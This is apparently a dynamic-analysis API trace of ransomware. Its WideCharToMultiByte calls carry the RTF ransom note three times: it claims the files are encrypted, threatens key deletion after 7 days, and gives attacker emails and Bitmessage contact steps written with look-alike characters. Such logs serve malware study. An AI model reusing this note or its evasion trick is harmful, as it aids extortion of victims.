\\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.521] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.522] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick 